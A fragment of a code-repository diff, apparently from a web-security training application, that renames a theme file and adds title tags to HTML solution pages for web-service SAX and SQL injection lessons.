src/main/webapp/lesson_solutions/WeakSessionID_files/themedata.thmx → src/main/webapp/lesson_solutions/WeakSessionID_filesBAK/themedata.thmx
View File

1
src/main/webapp/lesson_solutions/WsSAXInjection.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Web Service SAX Injection</title>
<link rel=File-List href="lesson_solutions/WsSAXInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSAXInjection_files/editdata.mso">
<!--[if !mso]>

1
src/main/webapp/lesson_solutions/WsSqlInjection.html
View File

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Web Service SQL Injection</title>
<link rel=File-List href="lesson_solutions/WsSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WsSqlInjection_files/editdata.mso">
<!--[if !mso]>

Some files were not shown because too many files have changed in this diff Show More